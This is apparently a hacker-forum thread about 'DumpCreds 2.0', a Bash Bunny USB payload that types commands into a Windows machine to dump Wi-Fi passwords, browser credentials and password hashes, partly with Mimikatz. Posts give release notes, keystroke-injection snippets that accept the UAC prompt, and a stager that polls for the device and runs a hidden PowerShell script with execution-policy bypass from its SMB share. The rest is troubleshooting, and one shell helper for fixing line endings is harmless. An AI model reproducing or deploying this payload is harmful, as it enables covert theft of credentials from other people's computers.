
[PAYLOAD] DumpCreds 2.0 ( SMB, w/o Internet, w/o USB Storage )


qdba


New Version 2.0.2 

Changelog: 

  • Parallelized the PowerSploit script, so the payload is faster.
  • Universal payload. The payload works no matter whether there is a UAC prompt or a credentials prompt. There is no kind of exploitation. You will not get admin rights if you didn't have them before. But without admin rights WifiDump, BrowserDump and ComputerInformation work fine. Only Hashdump and M1m1k@tz need admin rights.

Install:  

Copy all files to your switch directory. Don't forget the PS folder.

Download:

See first Post


36 minutes ago, illwill said:

I haven't tested yours, but with ChromeCreds I had an issue with it truncating the URLs with "..." if they were too long. This is how I solved it:

Get-ChromeCreds | ft UserURL, Password -AutoSize | Out-File $LOOTDIR\Chrome.txt -width 250

 

Thank you for the information. But it didn't work for me, because I start every process in its own PowerShell environment with Start-Job. I know there are a lot of other ways. But for me it was the fastest and easiest. :-)

 


Just now, Hectortxz said:

I tried it on Windows 8.1 and purple kept blinking slowly for 5 minutes. I'm doing something wrong.

Is it a slow blink or a fast blink? Is your SMB server kicking off? Does the BB have an IP?


47 minutes ago, Decoy said:

Is it a slow blink or a fast blink? Is your SMB server kicking off? Does the BB have an IP?

It's a slow blink. I think it's my IP. I set it to 172.16.64.1 and 255.255.255.0, but it'll turn red when I try the payload. But if my computer tries to automatically get the IP, it blinks a slow purple for 5 minutes.


9 hours ago, illwill said:

are your chrome results truncated ?

In Version 2.0.2 it works. In older versions they are truncated.


3 hours ago, Hectortxz said:

It's a slow blink. I think it's my IP. I set it to 172.16.64.1 and 255.255.255.0, but it'll turn red when I try the payload. But if my computer tries to automatically get the IP, it blinks a slow purple for 5 minutes.

If you set the IP manually, the var TARGET_IP will not be set by the bunny_helpers.sh script. So the check whether there is a target IP fails and it blinks red. I'm working on an extended version of bunny_helpers.sh. It's not an error of the payload.

If the LED blinks slow purple, the payload is waiting for smbserver and the handshake. Is a direct connection with Explorer to \\172.16.64.1\e working?

If yes, does it work when you start the script main.ps1 manually (enter "powershell -exec bypass \\172.16.64.1\e\main.ps1" in a cmd shell)?

Be sure you have the latest files (payload.txt, main.ps1 and the folder PS). There are some timing problems in early versions of payload.txt.


11 hours ago, Hectortxz said:

Change it in the payload?

Yes, it should look something like this:

# HID STAGE
# Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1.
LED R G B
ATTACKMODE HID

Q SET_LANGUAGE US

 

and:

# Bypass UAC :: Change "ALT j" according to your language i.e. for us it is ALT o
Q DELAY 1000
Q ALT y
Q DELAY 500
Q ENTER

 


After a firmware reset this afternoon, I ran into trouble with smbserver.py. It didn't start. The purple LED blinks slowly.

After some tests I realized that after running the tools_installer the things were installed fine, but smbserver.py had ^M at the end of every line.
I removed it in vi with :1,$s/<CTRL-v><CTRL-M>//g

or with the commands

------------------------------------------------

cd /pentest/impacket/examples

cp smbserver.py smbserver.py.sik

cat smbserver.py.sik | sed 's/\r$//g' >smbserver.py

-----------------------------------------------------------

Now it works again.

 

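The post above fixes the ^M problem by hand. The following helper, added here as an example and not taken from the thread or from the DumpCreds payload, does the same job in a checkable way: it counts lines ending in a carriage return, tests whether the shebang line is affected (a CR glued to "#!/usr/bin/python" makes the kernel look for an interpreter named "python\r", so the script never starts and the payload sits in the slow purple wait), strips the CRs into a fresh copy and keeps a .sik backup as the post does. It assumes only POSIX sh, grep and sed; the sample file is constructed inline so the block runs offline without the impacket tree.

```shell
#!/bin/sh
# Added example: detect and strip CRLF line endings from a script that refuses
# to start (the smbserver.py case from the thread). Not part of the payload.

CR=$(printf '\r')

# count_crlf FILE: print the number of lines that end in a carriage return.
count_crlf() {
    # grep -c exits 1 when the count is 0 but still prints "0"; do not abort.
    grep -c "${CR}\$" "$1" || true
}

# shebang_ok FILE: succeed only when the first line carries no trailing CR.
# This is the line the kernel parses to find the interpreter.
shebang_ok() {
    case "$(head -n 1 "$1")" in
        *"$CR") return 1 ;;
        *)      return 0 ;;
    esac
}

# fix_crlf FILE: keep FILE.sik as a backup (the post's naming), rewrite FILE
# with LF endings only. Redirecting into the existing file keeps its mode
# bits, so an executable script stays executable. Succeeds if no CR remains.
fix_crlf() {
    f="$1"
    cp "$f" "$f.sik" || return 1
    sed "s/${CR}\$//" "$f.sik" > "$f" || return 1
    [ "$(count_crlf "$f")" -eq 0 ]
}

# Demo on a constructed sample so the block runs without the real impacket tree.
demo_file=$(mktemp)
printf '#!/usr/bin/python\r\nimport sys\r\nprint("smbserver stub")\r\n' > "$demo_file"
echo "CRLF lines before: $(count_crlf "$demo_file")"
if shebang_ok "$demo_file"; then
    echo "shebang is clean"
else
    echo "shebang ends in CR: the script cannot be started directly"
fi
if fix_crlf "$demo_file"; then
    echo "CRLF lines after:  $(count_crlf "$demo_file") (backup in $demo_file.sik)"
fi
rm -f "$demo_file" "$demo_file.sik"
```

On the Bunny you would run it against /pentest/impacket/examples/smbserver.py and then confirm with ps -ef | grep smb that the server actually stays up; the backup lets you diff the two files if something else turns out to be wrong.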

20 hours ago, Decoy said:

Yes, you need to change the keyboard layout to US if you are in the US, and change the UAC bypass key to "y".

I changed the payload for the US and I pinged my IP at 172.16.64.1 and it came back good. It just doesn't pass the slow purple blink.


1 hour ago, Hectortxz said:

I changed the payload for the US and I pinged my IP at 172.16.64.1 and it came back good. It just doesn't pass the slow purple blink.

Can you connect to \\172.16.64.1\e from explorer?

Is smbserver.py running? (ssh to the Bunny and do a ps -ef | grep smb.) If not, see my post above; there is an error in the Impacket installed by tools_installer.

 


Hi, can you post a working smbserver.py? I tried nearly everything: a firmware reset, your command; the slow purple blink is still the problem.

I can connect to \\172.16.64.1\e

If I run powershell -exec bypass \\172.16.64.1\e\main.ps1 it works.

If I do ps -ef | grep smb

root       693     1  3 16:00 ?        00:00:14 python /pentest/impacket/examples/smbserver.py e /root/udisk/payloads/switch2
root      1393   967  0 16:06 pts/0    00:00:00 grep smb

and I have a German keyboard.

What is my mistake?

Greetings


16 minutes ago, Altao said:

Hi, can you post a working smbserver.py? I tried nearly everything: a firmware reset, your command; the slow purple blink is still the problem.

I can connect to \\172.16.64.1\e

If I run powershell -exec bypass \\172.16.64.1\e\main.ps1 it works.

If I do ps -ef | grep smb

root       693     1  3 16:00 ?        00:00:14 python /pentest/impacket/examples/smbserver.py e /root/udisk/payloads/switch2
root      1393   967  0 16:06 pts/0    00:00:00 grep smb

and I have a German keyboard.

What is my mistake?

Greetings

Are you using version 2.0.2?
Is there a UAC prompt or a credential prompt?

I guess there is a timing problem, so the main.ps1 script will not start.


LED R G
# Wait for Bunny Ethernet and Start main.ps1 Powershell Script
Q DELAY 500    # Increment to 1500 for testing
Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1; exit } }\""
Q DELAY 1000
Q ENTER
 

Does the main.ps1 script fire up right? Can you see the command in the console?

Take care that no other window is open on the screen. It works best on a pure desktop.


7 minutes ago, Altao said:

Hi, I use DumpCreds 2.0.2 Build 1003.

I tried your delay; still the same problem.

I see -.+.!

wifi-creds.....

and the rest

and at last, very briefly, a red script part, but too short to read.

Greetings

 

 

 

OK, that helps a lot. So the handshake thing works fine.

Now the error message would be helpful. With error messages that vanish very fast I do a trick: I make a video with the smartphone and step through it slowly by hand until the error message is visible.


4 hours ago, qdba said:

OK, that helps a lot. So the handshake thing works fine.

Now the error message would be helpful. With error messages that vanish very fast I do a trick: I make a video with the smartphone and step through it slowly by hand until the error message is visible.

Just modify the script to have a verbose or debug option and then have it fire off with the debug switch. For parts that may have errors I usually wrap them in a try; on catch I log to a local file if the debug flag is used. Helps during testing. Better yet, do not run the script hidden. Go to cmd and run his stager without the -WindowStyle option. Or launch PowerShell, take the code after the -C in his PowerShell command and run it straight. You should then have the PS session still open to scroll back through the errors.

 


DumpCreds 2.1 New Version

Changelog

  • Completely new payload.txt code for Bash Bunny 1.1
  • Added a lot of debug code to the payload.
    For debugging, create a file "DEBUG" in the payload folder. You get the debug log in \loot\Dumpcreds_2.1
  • Impacket .deb included for easy Impacket installation
  • Some Ducky languages included (from the DuckyInstall payload)

 
